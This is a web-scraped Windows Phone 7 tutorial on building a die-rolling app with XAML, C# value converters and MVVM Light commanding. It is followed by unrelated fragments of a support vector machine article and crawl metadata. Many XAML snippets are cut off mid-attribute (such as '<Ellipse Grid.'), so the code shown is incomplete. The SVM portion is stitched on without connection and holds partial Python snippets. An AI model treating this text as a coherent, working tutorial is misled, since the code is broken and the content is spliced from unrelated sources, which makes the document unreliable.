surface. <!-> Insert the following XAML between the opening and closing tags of the Grid element (near the bottom) which has the attribute x:Name=”ContentPanel” <Grid.RowDefinitions> <RowDefinition Height="Auto"/> <RowDefinition Height="*"/> <RowDefinition Height="*"/> <RowDefinition Height="*"/> </Grid.RowDefinitions> <Grid.ColumnDefinitions> <ColumnDefinition Width="*"/> <ColumnDefinition Width="*"/> <ColumnDefinition Width="*"/> </Grid.ColumnDefinitions> <TextBlock Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. If you’ve done that correctly, the designer will look like this… We have an object to represent a die and we have a grid of dots. What we need is a way to turn each dot ‘on’ and ‘off’ according to its position and the value of the die. Binding & Converters Go back to DieVM.cs Add this additional using statement right under the others. using System.Windows.Data; Then add this code just inside the last } bracket at the end of the file. public class DieValueToDotOpacityConverter : IValueConverter { #region IValueConverter Members int[,] dotmatix = new int[6,9] { { 0,0,0, 0,1,0, 0,0,0 } , { 0,0,1, 0,0,0, 1,0,0 }, { 0,0,1, 0,1,0, 1,0,0 }, { 1,0,1, 0,0,0, 1,0,1 }, { 1,0,1, 0,1,0, 1,0,1 }, { 1,0,1, 1,0,1, 1,0,1 } }; public object Convert(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture) { try { int pos = int.Parse((String)parameter); int dievalue = (int)value - 1; return (double)((dotmatix[dievalue, pos] == 1) ? 1 : 0); } catch { return 1; } } public object ConvertBack(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture) { throw new NotImplementedException(); } #endregion } Build the solution again. This is a value converter that will be used when we ‘bind’ each dot to the value of the die. Take a look at the array of integers used and you should see the pattern of dots typically used for each die value. Given a logical position from 0 to 8 and the value of a die, the convertor provides the desired opacity (1 for solid or 0 for transparent). To be able to apply this convertor to the dots in XAML, we have to introduce into the XAML document, the .NET Namespace in which the converter class resides. Insert this XML namespace declaration near the top of the MainPage.xaml document, after the last line that also starts “xmls:” xmlns:local="clr-namespace:DieApp" … and then we have to instantiate an instance of the convertor object and give it a name by which we have refer to it elsewhere in the XAML document. Insert this XAML </Grid.RowDefinitions> on the Grid with x:Name=”LayoutRoot” <Grid.Resources> <local:DieValueToDotOpacityConverter x: </Grid.Resources> Now we can add bind on the opacity of each dot using the converter. Replace the existing Ellipse elements with these ones. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. <Ellipse Grid. So we are now binding the value of a dot’s Opacity to the Value property of some object. This means value is copied from the Value property of some object to the Opacity property of the Ellipse via the converter. This happens when the Ellipse is created, and whenever the object with the Value property fires the PropertyChanged event. Note how we want to bind the Opacity to the Value of a DieVM object, so we need to instantiate a DieVM object. XAML can be used to declare non-visual .NET objects and properties too. We are going to create XAML to represent a DieVM object so we have something to see at design time. Sample Data Right-click DieApp in Solution Explorer, select Add, then New Item… Select “XML File” as shown, but carefully enter “SampleDieVM.xaml” as the Name. Click Add and then replace the whole contents of the file with this XAML <local:DieVM xmlns="" xmlns:x="" xmlns: Click Reload the designer and you’ll see a message indicating that the design surface is blank because there are no visual objects. Go back to MainPage.xaml and update the opening Grid element as shown. <Grid x: And just like that, your design surface should now show the appropriate die dots for a value of 2 (as defined in the SampleDieVM.xaml file. Go back to the SampleDieVM.xaml file, change the Value attribute and then switch back to MainPage.xaml to see that we now have bound design-time UI. Runtime Data We now need to instantiate a DieVM object as runtime, so let’s simply declare one in XAML. In MainPage.xaml, update the <Grid.Resources> element contents to look like this: <Grid.Resources> <local:DieValueToDotOpacityConverter x: <local:DieVM x: </Grid.Resources> Then update the <Grid> open tag to look like this, declaring a DieVM instance to use separately for design-time (starting with d:) and at runtime. <Grid x: Press F5 to try the application in the included phone emulator (shown here with option buttons shown when the cursor is near the top right)… We see a single dot representing a 1. That’s because the DieVM class initialized it to 1. You can go to DieVM.cs and update this line to another value from 1 to 6 and try running the application again. private int _value = 1; Commanding the Die Our DieVM class is capable of ‘rolling’ the Value and we want to have the dots update when that happens. We are set up for that, because the Ellipse Opacity of each dot is bound to the Value property of DieVM and, because the DieVM class implements INotifyPropertyChanged and calls the PropertyChanged event when Value changes, the Opacity value will be updated (via the converter). As you can see in the images, we want to make it so that clicking on the grid starts the rolling action. We are going to do that we more of the MVVM Light components. Add these XML namespace to the top of MainPage.xaml right under the existing ones. xmlns:i="clr-namespace:System.Windows.Interactivity;assembly=System.Windows.Interactivity" xmlns:mvvmextra="clr-namespace:GalaSoft.MvvmLight.Command;assembly=GalaSoft.MvvmLight.Extras.WP7" Replace the opening tag of the Grid element with this XAML <Grid x: <i:Interaction.Triggers> <i:EventTrigger <mvvmextra:EventToCommand </i:EventTrigger> </i:Interaction.Triggers> The MVVM Light component listens for the MouseLeftButtonDown event. When it occurs, the component looks for a property on the DieVM called RollCommand supporting the .NET ICommand interface and calls the Execute method of that object. Our DieVM class has such a property. It is a RelayCommand class from the MVVM Light components. It support ICommand, and allows us to easily declare the code to run when the Execure method of the ICommand interface is called. Run the application again and try clicking on the screen – the die will roll! Just to make it clear when the die is rolling we are going to hide the instruction text when the die is rolling. The DieVM class has an IsRolling property. We’ll need to convert that Boolean property to a Silverlight visibility enumeration value. Add this code for another binding converter to the end of the DieVM.cs file at the end, just before the closing } bracket for the namespace. public class BooleanToOpacityConverter : IValueConverter { #region IValueConverter Members public object Convert(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture) { Boolean b = (Boolean)value; if (((String)parameter).Equals("invert")) b = !b; return b ? 1 : 0; } public object ConvertBack(object value, Type targetType, object parameter, System.Globalization.CultureInfo culture) { throw new NotImplementedException(); } #endregion } Build the Solution! Update the <Grid.Resource> element contents in MainPage.xaml as shown to introduce an instance of the converter. <Grid.Resources> <local:DieValueToDotOpacityConverter x: <local:DieVM x: <local:BooleanToOpacityConverter x: </Grid.Resources> Update the XAML for the TextBlock to bind to the IsRolling property using the converter. <TextBlock Grid. Run the application to try it. Orientation Support If you click on the rotate buttons at the top-right of the emulator, you will notice that the die does not re-orientate itself. However, since we designed the layout so that the grid and its columns use the available space we can indicate that we support both orientations and let the phone OS rotate our layout safe in the knowledge that it will still fit in the opposite aspect ratio. In MainPage.xaml, update this XAML SupportedOrientations="PortraitOrLandscape" Orientation="Portrait" Try it again in the emulator. We’ve finished building the functionality of the application. Does it actually work on a real device? Test on a Real Device Some application can be tested very thoroughly on the emulator. Some features such as the accelerometer, location services and various settings cannot be easily tested (though in some cases they can be emulated by mock classes and testing code). To debug with a real device, all of these points must be met: - Version 4.7+ of the Zune software (free to download from) must be running on the development PC. - The device must be connected to the PC using the provided USB cable. - The device must be ‘development unlocked’ (see below) - The device must be on and not on the lock screen. Connect a device When you connect a Windows Phone 7 device, the Zune software should launch (unless disabled) and show the device as connected. Unlock a device To test on a real device, the device must be ‘deployment-unlocked’. This is not the same as ‘network-unlocked’ (whereby a device is not limited to use on a specific wireless carrier). Devices are ‘unlocked’ against a developer subscription – up to 3 at once (or just 1 on a student subscription). Once unlocked, anyone can test on them. To unlock a connected device (showing in the Zune software) and register it against a subscription, run the Windows Phone Developer Registration Tool (included with the developer tools) and use the Live ID of a subscription that has a free slot. Registered devices show up on the App Hub: Debug using the device To debug on the device, switch to the device in Visual Studio on the Standard toolbar. So your application is feature complete, debugged on the emulator, and tested on a device. It’s time to get it ready for marketplace submission if you wish to publish it to others. Make Ready for Submission There are a number of things you need to do to get your application ready for submission. Obviously at this point I’m talking about the steps I took to submit this sample application to the marketplace. Build your own app – don’t use mine :P. Certifiable The most important thing is to make sure the application meets the published certification requirements which can be found on the App Hub or directly here. The following sections cover some of those requirements for certifications and necessary preparations for submitting an application. Release Build Switch to a release build in Visual Studio and test again. Remove the diagnostic readout You will have noticed numbers down the side of the screen when testing. These are useful when testing the performance of more visually Silverlight applications. To remove the readout, comment out this line in App.xaml.cs // Application.Current.Host.Settings.EnableFrameRateCounter = true; Update your splash screen The file SplashScreenImage.jpg is shown on the phone while your application is initializing. A splash screen can be based on a screenshot of the application, perhaps with the addition of some visual indication that the application is starting up. You can use the Windows 7 Snipping Tool (in Window mode) to capture the emulator screen when it’s running at 100% window size, e.g… Project Properties You need to set the title of the application used in the phone’s program list and if pinned as a start tile. Right-click the DieApp project in Solution Explorer and select Properties… You then update Title under Deployment Options & under Tile Options to, e.g. “Die Roller” Click on the “Assembly Information” button and update with suitable information. Application Exception handler If the application has an unhandled exception it will just quit on the phone. You need to make sure the something friendly is displayed, so update this function is App.xaml.cs as shown, or to something else friendly. // Code to execute on Unhandled Exceptions private void Application_UnhandledException(object sender, ApplicationUnhandledExceptionEventArgs e) { if (System.Diagnostics.Debugger.IsAttached) { // An unhandled exception has occurred; break into the debugger System.Diagnostics.Debugger.Break(); } else { MessageBox.Show("Apologies. Unfortunately there has been an error in the application and it will now close.", "Application Error", MessageBoxButton.OK); } } Application Icons You need to update the Background.png file (which must be a 173x173 pixel PNG – shown if the application is pinned as a start tile), e.g.: You need to update the ApplicationIcon.png (which must be a 62x62 pixel PNG– shown in the programs list), e.g.: You also need 99x99 & 200x200 PNGs for the application submission process. You can also optionally produce a 1000x800 PNG that would be shown as the panaromic background of the Marketplace hub on the phone if your application is featured by Microsoft. Application Information The application must provide an obvious way to show its name, its version and author contact information. To do that, you can enable the application bar in the application to show an ‘About’ button that when clicked, will show the information. For that, you need a compatible icon for the button, which should be a white shape on a transparent background in a 48x48 pixel PNG. Right-click DieApp in Solution Explorer, select Add, then Existing Item… Enter this path into the freely distributed pack of icons included with the tools… %ProgramFiles(x86)%\Microsoft SDKs\Windows Phone\v7.0\Icons\dark\appbar.questionmark.rest.png Select the file in Solution Explorer, press F2, rename it to “about.png” and press ENTER. Go to the Properties window and change the Build Action to Content Put this code inside the MainPage class within MainPage.xaml.cs (expand MainPage.xaml in Solution Explorer to file the file) private void ApplicationBarIconButton_Click(object sender, EventArgs e) { MessageBox.Show("Die Roller V1 by Colinizer" + Environment.NewLine + "" + Environment.NewLine + "Copyright © Colin Melia 2010", "About", MessageBoxButton.OK); } Of course this is my information – you would use yours in your own (unique) application. Locate the commented out application bar code at the bottom of MainPage.xaml and replace it with this XAML. <phone:PhoneApplicationPage.ApplicationBar> <shell:ApplicationBar <shell:ApplicationBarIconButton </shell:ApplicationBar> </phone:PhoneApplicationPage.ApplicationBar> Screenshots You need at least 1 (480x800 PNG) screenshot to submit an application, e.g. Submit to Marketplace At this point you are finally ready to submit. Go to the App Hub and then select my dashboard->windows phone->submit new app. A Windows Phone 7 Application Submission Walkthrough is available here. Here’s what I did: Step 1 Step 2 Step 3 Step 4 Step 5 Once you have submitted the application you can check back on its status on the App Hub under my dashboard->windows phone->my apps. Good luck and if you can’t decide which idea to try first… there’s a die rolling app that may help you decide. :) }}
https://dzone.com/articles/step-by-step-windows-phone-7?mz=27249-windowsphone7
CC-MAIN-2017-43
refinedweb
3,783
54.83
Up to [DragonFly] / src / sys / kern Request diff between arbitrary revisions Keyword substitution: kv Default branch: MAIN MFC numerous features from HEAD. * NFS export support for nullfs mounted filesystems, intended for nullfs mounted hammer PFSs. * Each nullfs mount constructs a unique fsid based on the underlying mount. * Each nullfs mount maintains its own netexport structure. * The mount pointer in the nch (namecache handle) is passed into FHTOVP and friends, allowing operations to occur on the underlying vnodes but still go through the nullfs mount. * Implement the ability to export NULLFS mounts via NFS. * Enforce PFS isolation when exporting a HAMMER PFS via a NULLFS mount. NOTE: Exporting anything other then HAMMER PFS root's via nullfs does NOT protect the parent of the exported directory from being accessed via NFS. Generally speaking this feature is implemented by giving each nullfs mount a synthesized fsid based on what is being mounted and implementing the NFS export infrastructure in the nullfs code instead of just bypassing those functions to the underyling VFS. MFC 1.117 - fix desiredvnodes calculation for machines with >2G ram. Requested-by: Francois Tigeot <ftigeot@wolfpond.org> Adjust the desiredvnodes (kern.maxvnodes) calculation for machines with 3G+ of ram to prevent it from blowing out KVM. Reported-by: Michael Neumann <mneumann@ntecs.de> Correct a bug in the last commit. Add a vclean_unlocked() call that allows HAMMER to try to get rid of a vnode.. Fix a race between the namecache and the vnode recycler. A vnode cannot be recycled if it's namecache entry represents a directory with locked children. The various VOP_N*() functions require the parent dvp to be stable. The main fix is in vrecycle() (kern/vfs_subr.c). Do not vgone() the vnode if we can't clean out the children. Also create an API to assert that the parent dvp is stable, and make it vhold/vdrop the dvp. The race primarily effected HAMMER which uses the VOP_N*() API. Have vfsync() call buf_checkwrite() on buffers with bioops to determine whether it is ok to write out a buffer or not. Used by HAMMER to prevent specfs from syncing out meta-data at the wrong time. * Implement a mountctl() op for setting export control on a filesystem. * Adjust mountd to try to use the mountctl() op BEFORE calling a UFS-style mount() to set export ops for a filesystem. * Add a prototype for the mountctl() system call in sys/mountctl.h * Cleanup WARNS for the mountctl utility. For kmalloc(), MALLOC() and contigmalloc(), use M_ZERO instead of explicitly bzero()ing. Reviewed-by: sephe Add bio_ops->io_checkread and io_checkwrite - a read and write pre-check which gives HAMMER a chance to set B_LOCKED if the kernel wants to write out a passively held buffer. Change B_LOCKED semantics slightly. B_LOCKED buffers will not be written until B_LOCKED is cleared. This allows HAMMER to hold off B_DELWRI writes on passively held buffers.. Reactivate a vnode after associated it with deadfs after a forced unmount. This fixes numerous system panics that can occur due to the vnode's unexpected change in state. Submitted-by: "Nicolas Thery" <nthery@gmail.com>> Formalize the object sleep/wakeup code when waiting on a dead VM object and remove spurious calls to wakeup().).). 1:1 Userland threading stage 2.9/4: Push out p_thread a little bit more. Rename struct specinfo into struct cdev. Add a new typedef 'cdev_t' for cdev pointers. Temporarily retain dev_t for cdev pointers until the kernel can be converted over to cdev. VNode sequencing and locking - part 2/4. Control access to v_usecount and v_holdcnt with the vnode's lock's spinlock. Use the spinlock to interlock the VRECLAIMED and VINACTIVE flags during 1->0 and 0->1 transitions. N->N+1 transitions do not need to obtain the spinlock and simply use a locked bus cycle increment. Vnode operations are still not MP safe but this gets further along that road. The lockmgr can no longer fail when obtaining an exclusive lock, remove the error code return from vx_lock() and vx_get(). Add special lockmgr support routines to atomically acquire and release an exclusive lock when the caller is already holding the spinlock. The removal of vnodes from the vnode free list is now defered. Removal only occurs when allocvnode() encounters a vnode on the list which should not be on it. This improves critical code paths for vget(), vput() and vrele() by removing unnecessary manipulation of the freelist. Fix a lockmgr bug where wakeup() was being called with a spinlock held. Instead, defer the wakeup until after the spinlock is released. VNode sequencing and locking - part 1/4. Separate vref() for the case where the ref count is already non-zero (which is nearly all uses of vref()), vs the case where it might be zero. Clean up the code in preparation for putting it under a spinlock. Remove several layers in the vnode operations vector init code. Declare the operations vector directly instead of via a descriptor array. Remove most of the recalculation code, it stopped being needed over a year ago. This work is similar to what FreeBSD now does, but was developed along a different line. Ultimately our vop_ops will become SYSLINK ops for userland VFS and clustering support. Disassociate the VM object after calling VOP_INACTIVE instead of before. VOP_INACTIVE may have to do some work on the vnode that requires a functional buffer cache. For example, UFS may have to truncate a removed file. Cleanup crit_*() usage to reduce bogus warnings printed to the console when a kernel is compiled with DEBUG_CRIT_SECTIONS. NOTE: DEBUG_CRIT_SECTIONS does a direct pointer comparison rather than a strcmp in order to reduce overhead. Supply a string constant in cases where the string identifier might be (intentionally) different otherwise. Remove an inappropriate crit_exit() in ehci.c and add a missing crit_exit() in kern/vfs_subr.c. Specify string IDs in vfsync_bp() so we don't get complaints on the console when the kernel is compiled with DEBUG_CRIT_SECTIONS. The missing crit_exit() in kern/vfs_subr.c was causing the kernel to leave threads in a critical section, causing interrupts to stop operating and cpu-bound userland programs to lock up the rest of the system. Reported-by: Sascha Wildner <saw@online.de>, others.... Remove vnode lock assertions that are no longer used. Remove the IS_LOCKING_VFS() macro. All VFS's are required to be locking VFSs now. Remove the thread argument from all mount->vfs_* function vectors, replacing it with a ucred pointer when applicable. This cleans up a considerable amount of VFS function code that previously delved into the process structure to get the cred, though some code remains. Get rid of the compatibility thread argument for hpfs and nwfs. Our lockmgr calls are now mostly compatible with NetBSD (which doesn't use a thread argument either). Get rid of some complex junk in fdesc_statfs() that nobody uses. Remove the thread argument from dounmount() as well as various other filesystem specific procedures (quota calls primarily) which no longer need it due to the lockmgr, VOP, and VFS cleanups. These cleanups also have the effect of making the VFS code slightly less dependant on the calling thread's context. VOP_BWRITE(). This function provided a way for a VFS to override the bwrite() function and was used *only* by NFS in order to allow NFS to handle the B_NEEDCOMMIT flag as part of NFSv3's 2-phase commit operation. However, over time, the handling of this flag was moved to the strategy code. Additionally, the kernel now fully supports the redirtying of buffers during an I/O (which both softupdates and NFS need to be able to do). The override is no longer needed. All former calls to VOP_BWRITE() now simply call bwrite(). Remove b_xflags. Fold BX_VNCLEAN and BX_VNDIRTY into b_flags as B_VNCLEAN and B_VNDIRTY. Remove BX_AUTOCHAINDONE and recode the swap pager to use one of the caller data fields in the BIO instead.. Get rid of the weird FSMID update path in the vnode and namecache code. Instead, mark the vnode as needing an FSMID update when the vnode is disconnected from the namecache. This fixes a bug where FSMID updates were being lost at unmount time. vfsync() is not in the business of removing buffers beyond the file EOF. Remove the procedural argument and related code. Remove unused code label. MFC vfs_bio.c 1.57, vfs_subr.c 1.69 - fix race condition in vfs_bio_awrite().. Use the vnode v_opencount and v_writecount universally. They were previously only used by specfs. Require that VOP_OPEN and VOP_CLOSE calls match. Assert on boundary errors. Clean up umount's FORCECLOSE mode. Adjust deadfs to allow duplicate closes (which can happen due to a forced unmount or revoke). Add vop_stdopen() and vop_stdclose() and adjust the default vnode ops to call them. All VFSs except DEADFS which supply their own vop_open and vop_close now call vop_stdopen() and vop_stdclose() to handle v_opencount and v_writecount adjustments. Change the VOP_OPEN/fp specs. VOP_OPEN (aka vop_stdopen) is now responsible for filling in the file pointer information, rather than the caller of VOP_OPEN. Additionally, when supplied a file pointer, VOP_OPEN is now allowed to populate the file pointer with a different vnode then the one passed to it, which will be used later on to allow filesystems which synthesize different vnodes on open, for example so we can create a generic tty/pty pairing devices rather than scanning for an unused pty, and so we can create swap-backed generic anonymous file descriptors rather than having to use /tmp. And for other purposes as well. Fix UFS's mount/remount/unmount code to make the proper VOP_OPEN and VOP_CLOSE calls when a filesystem is remounted read-only or read-write. A VM object is now required for vnode-based buffer cache ops. This is usually handled by VOP_OPEN but there are a few cases where UFS issues buffer cache ops on vnodes that have not been opened, such as when creating a new directory or softlink.. Replace the global buffer cache hash table with a per-vnode red-black tree. Add a B_HASHED b_flags bit as a sanity check. Remove the invalhash junk and replace with assertions in several cases where the buffer must already not be hashed. Get rid of incore() and gbincore() and replace with a new function called findblk(). Merge the new RB management with bgetvp(), the two are now fully integrated. Previous work has turned reassignbuf() into a mostly degenerate call, simplify its arguments and functionality to match. Remove an unnecessary reassignbuf() call from the NFS code. Get rid of pbreassignbuf(). Adjust the code in several places where it was assumed that calling BUF_LOCK() with LK_SLEEPFAIL after previously failing with LK_NOWAIT would always fail. This code was used to sleep before a retry. Instead, if the second lock unexpectedly succeeds, simply issue an unlock and retry anyway. Testing-by: Stefan Krueger <skrueger@meinberlikomm.de> vfs_bio_awrite() was unconditionally locking a buffer without checking for races, potentially resulting in the wrong buffer, an invalid buffer, or a recently replaced buffer being written out. Change the call semantics to require a locked buffer to be passed into the function rather then locking the buffer in the function. buftimespinlock is utterly useless since the spinlock is released within lockmgr(). The only real problem was with lk_prio, which no longer exists, so get rid of the spin lock and document the remaining passive races. Pass LK_PCATCH instead of trying to store tsleep flags in the lock structure, so multiple entities competing for the same lock do not use unexpected flags when sleeping. Only NFS really uses PCATCH with lockmgr locks.. Add a sanity check for the length of the file name to vop_write_dirent(). Fix merge bug. d_namlen is used by GENERIC_DIRSIZ, when it isn't initialised, the argument to bzero is wrong. Add vop_write_dirent helper functions, which isolates the caller from the layout and setup of struct dirent. When allocating memory for the index file, query the filesystem for the maximum entry name first and use that. Add vn_get_namelen to simplify correct emulation of statfs with maximum name length field. Discussed-with: hmp Remove spl*() calls from kern, replacing them with critical sections. Change the meaning of safepri from a cpl mask to a thread priority. Make a minor adjustment to tests within one of the buffer cache's critical sections. MFC 1.56. Minor kernel stack memory disclosure. Security: FreeBSD-SA-05:08.kmem! Abstract out the routines which manipulate the mountlist. Introduce an MP-safe mountlist scanning function. This function keeps track of scans which are in-progress and properly handles ripouts that occur during the callback by advancing the matching pointers being tracked. The callback can safely block without confusing the scan. This algorithm has already been successfully used for the buffer cache and will soon be used for the vnode lists hanging off the mount point.. Convert the struct domain next pointer to an SLIST.@it.su.se> Don't use the statfs field f_mntonname in filesystems. For the userland export code, it can synthesized from mnt_ncp. For debugging code, use f_mntfromname, it should be enough to find culprit. The vfs_unmountall doesn't use code_fullpath to avoid problems with resource allocation and to make it more likely that a call from ddb succeds. Change getfsstat and fhstatfs to not show directories outside a chroot path, with the exception of the filesystem counting the chroot root itself.. Clean up routing code before I parallelize it. Cleanup some dangling issues with cache_inval(). A lot of hard work went into guarenteeing that the namecache topology would remain connected, but there were two cases (basically rmdir and rename-over-empty-target-dir) which disconnected a portion of the hierarchy. This fixes the remaining cases by having cache_inval() simply mark the namecache entry as destroyed without actually disconnecting it from the topology. The flag tells cache_nlookup() and ".." handlers that a node has been destroyed and is no longer connected to any parent directory. The new cache_inval() also now has the ability to mark an entire subhierarchy as being unresolved, which can be a useful feature to have. In-discussion-with: Richard Nyberg <rnyberg@it.su.se>.. The old lookup() API is extremely complex. Even though it will be ripped out soon, I'm documenting the procedure so I don't have to keep running through it to figure out what is going on. Do a better job describing the new vgone() API (the old API required the vnode to be in a very weird state. The new API requires the vnode to be VX locked and refd and returns with the vnode in the same state). 5b/99. More cleanups, remove the (unused) ni_ncp and ni_dncp from struct nameidata. A new structure will be used for the new API. Remove unused variable. Fix a bug in sillyrename handling in nfs_inactive(). The code was improperly ignoring the lock state of the passed vp and recursing nfs_inactive() by calling vrele() from within nfs_inactive(). Since NFS uses real vnode locking now, this resulted in a panic. KDE startup problems reported by: Emiel Kollof <coolvibe@hackerheaven.org>.).. ANSIfication and general cleanup. No operational changes. Cleanup pass. Removed code that is not needed anymore. Cleanup VOP_LEASE() uses and document. Add in a debug function for buffer pool statistical information which can be toggled via debug.syncprt.. namecache work stage 4: (1) Remove vnode->v_dd, vnode->v_ddid, namecache->nc_dvp_data, and namecache->nc_dvp_id. These identifiers were being used to detect stale parent directory linkages in the namecache and were leftovers from the original FreeBSD-4.x namecache topology. The new namecache topology actively discards such linkages and does not require them. (2) Cleanup kern/vfs_cache.c, abstracting out allocation and parent link/unlink operations into their own procedures. (3) Formally allow a disjoint topology. That is, allow the case where nc_parent is NULL. When constructing namecache entries (dvp,vp), require that that dvp be associated with a namecache record so we can create the proper parent->child linkage. Since no naming information is known for dbp, formally allow unnamed namecache records to be created in order to create the association. (4) Properly relink parent namecache entries when ".." is entered into the cache. This is what relinks a disjoint namecache topology after it has been partially purged or when the namecache is instantiated in the middle of the logical topology (and thus disjoint). Note that the original plan was to not allow a disjoint topology, but after much hair pulling I've come to the conclusion that it is impossible to do this. So the work now formally allows a disjoint topology but also, unlike the original FreeBSD code, takes pains to try to keep the topology intact by only recycling 'leaf' vnodes. This is accomplished by vref()ing a vnode when its namecache records have children. Protect v_usecount with a critical section for now (we depend on the BGL), and assert that it does not drop below 0. Suggested-by: David Rhodus <drhodus@machdep.com> Move the ASSERT_VOP_LOCKED and ASSERT_VOP_UNLOCKED macros into its own functions. Idea taken from: FreeBSD a globaldata_t instead of a cpuid in the lwkt_token structure. The LWKT subsystem already uses globaldata_t instead of cpuid for its thread td_gd reference, and the IPI messaging code will soon be converted to take a globaldata_t instead of a cpuid as well. This reduces the number of memory indirections we have to make to access the per-cpu globaldata space in various procedures. Try to work-around a DFly-specific crash that can occur in ufs_ihashget() if the underlying vnode is being reclaimed at the same time. Bump the vnodes ref count to interlock against vget's VXLOCK test.> namecache work stage. 1) Add new tunable, kern.syncdelay: kern.syncdelay can be used to change the delay time between file system data synchronization. This is useful when you have notebooks. 2) Document the following sysctls: kern.dirdelay, kern.metadelay and kern.filedelay __P() removal Properly handle an error return from udev2dev(). Reviewed by: dillon@sbcglobal.net>, Jeffrey Hsu <hsu@FreeBSD.org> Register keyword removal Approved by: Matt Dillon :-) Throw better sanity checks into vfs_hang_addrlist() for argp->ex_addrlen and argp->ex_masklen which are otherwise totally unchecked from userland.. The syncer is not a process any more, deal with it as a thread.. proc->thread stage 1: change kproc_*() API to take and return threads. Note: we won't be able to turn off the underlying proc until we have a clean thread path all the way through, which aint now. thread stage 5: Separate the inline functions out of sys/buf.h, creating sys/buf2.h (A methodology that will continue as time passes). This solves inline vs struct ordering problems. Do a major cleanup of the globaldata access methodology. Create a gcc-cacheable 'mycpu' macro & inline to access per-cpu data. Atomicy is not required because we will never change cpus out from under a thread, even if it gets preempted by an interrupt thread, because we want to be able to implement per-cpu caches that do not require locked bus cycles or special instructions. Add the DragonFly cvs id and perform general cleanups on cvs/rcs/sccs ids. Most ids have been removed from !lint sections and moved into comment sections. import from FreeBSD RELENG_4 1.249.2.30
http://www.dragonflybsd.org/cvsweb/src/sys/kern/vfs_subr.c?f=h
CC-MAIN-2014-15
refinedweb
3,214
57.67
Hello Experts, We are trying import data from flat file. We have 'Account' dimension member in column number 5. And on the basis of this we want to decide the value of View dimension. For example, If Account numbers are starting from 1, 2 or 3 then View will be 'YTD' otherwise for rest of the members View will be 'Periodic'.. In order to achieve this, we have written the below script and associated it with View dimension in Import Format. def ISMapView_All(strField,strRecord): strAccount = strField if strAccount[0:1] == "1": fdmResult = "YTD" return fdmResult elif strAccount[0:1] == "2": fdmResult = "YTD" return fdmResult elif strAccount[0:1] == "3": fdmResult = "YTD" return fdmResult else: fdmResult = "Periodic" return fdmResult But Import process itself is getting failed. Am I missing anything in above code? Any guess? Kindly suggest. Regards Nishant I don't see why you even need this script. Why don't you just map it using standard wildcard maps? Hi All, Its done. I can able to import data. As Jython scripting is a very case sensitive, need to have a script with proper indentation. Indentation was not properly given was facing issue. Thanks Nishant
https://community.oracle.com/thread/4034879
CC-MAIN-2018-26
refinedweb
196
56.96
package My::Class; use strict; use warnings; # Generate 3 accessors use Test2::Util::HashBase2::Util::HashBase qw/bat/; sub init { my $self = shift; # We get the constants from the base class for free. $self->{+FOO} ||= 'SubFoo'; $self->{+BAT} ||= 'bat'; ']); # Accessors! my $foo = $one->foo; # 'MyFoo' my $bar = $one->bar; # 'MyBar' my $baz = $one->baz; # Defaulted to: 'baz' # Setters! $one->set_foo('A Foo'); #'-bar' means read-only, so the setter will throw an exception (but is defined). $one->set_bar('A bar'); # '^baz' means deprecated setter, this will warn about the setter being # deprecated. $one->set_baz('A Baz'); $one->{+FOO} = 'xxx'; Test2::Util::HashBase qw/foo/; This will generate the following subs in your namespace: The main reason for using these constants is to help avoid spelling mistakes and similar typos. It will not help you if you forget to prefix the '+' though. use Test2::Util::HashBase qw/-foo/; use Test2::Util::HashBase qw/^foo/; use base 'Another::HashBase::Class'; use Test2::Util:
https://man.linuxreviews.org/man3pm/Test2::Util::HashBase.3pm.html
CC-MAIN-2020-10
refinedweb
161
54.93
This article breaks down the topic of support vector machines deductively, covering the most basic approach to the underlying mathematics. The information is supported by examples and aims to create their own approaches to the subject, regardless of their level of knowledge. This article breaks down the topic of support vector machines deductively, covering the most basic approach to the underlying mathematics. The information is supported by examples and aims to create their own approaches to the subject, regardless of their level of knowledge. Table of Contents (TOC) 1\. Introduction 2\. Kernelized Support Vector Machines 2.1\. Linear Model 2.2\. Polynomial Kernel 2.3\. Gaussian RBF Kernel 3\. Hyperparameters 4\. Under the Hood Support Vector Machines are powerful and versatile machine learning algorithms that can be used for both classification and regression. The usage area of these algorithms is quite wide. It is dynamically developed and used in many fields from images classification to medical image cancer diagnosis, from text data to bioinformatics. Since we’re going to take the whole thing and break it down, let’s first illustrate the instinctive basic working of support vector machines. Let’s create a dataset with 2 inputs (x1 and x2) and 2 outputs (purple and red) as seen in figure 1(left). The goal of the model is to predict the class of data which is given x1 and x2 values after the model is trained. In other words, model should distinguish the dataset in the most optimal way. Purple and red data can be linearly separated by an infinite number of linear lines as seen in figure 1(middle). Looking at these lines, it is realized that none of these infinitely drawn points are related to the number or density of data in the dataset. These reference points are called support vectors (Figure 1. right). Support vectors are the data which are closest the hyperplane. Now, let’s quickly separate the make_blob dataset with 100 data and 2 classes, which we imported with the scikit learn library, with the support vector machine. import mglearn import matplotlib.pyplot as plt from sklearn.datasets import make_blobs import numpy as np IN[1] x, y = make_blobs(n_samples=100, centers=4, cluster_std=0.8, random_state=8) y=y%2 IN[2] mglearn.discrete_scatter(x[:, 0], x[:, 1], y) IN[3] from sklearn.svm import LinearSVC linear_svm = LinearSVC().fit(x, y) mglearn.plots.plot_2d_separator(linear_svm, x) mglearn.discrete_scatter(x[:, 0], x[:, 1], y) plt.xlabel("Feature 0") plt.ylabel("Feature 1") IN[4] from sklearn.svm import SVC svm = SVC(kernel='rbf').fit(x, y) mglearn.plots.plot_2d_separator(svm, x) mglearn.discrete_scatter(x[:, 0], x[:, 1], y) plt.xlabel("Feature 0") plt.ylabel("Feature 1") It can be seen both in the accuracy of the test data and visually that Linear SVM separates classes worse than the Radial Basis Function (RBF) Kernel. Now let’s examine the kernel types in the Support Vector Machines one by one. supervised-learning artificial-intelligence data-science machine-learning This "Deep Learning vs Machine Learning vs AI vs Data Science" video talks about the differences and relationship between Artificial Intelligence, Machine Learning, Deep Learning, and Data Science. Many professionals and 'Data' enthusiasts often ask, “What's the difference between Data Science, Machine Learning and Big Data?”. Let's clear the air. If you are still wondering about it then this article is for you.? Enroll now at best Artificial Intelligence training in Noida, - the best Institute in India for Artificial Intelligence Online Training Course and Certification.
https://morioh.com/p/677a495b1657
CC-MAIN-2021-31
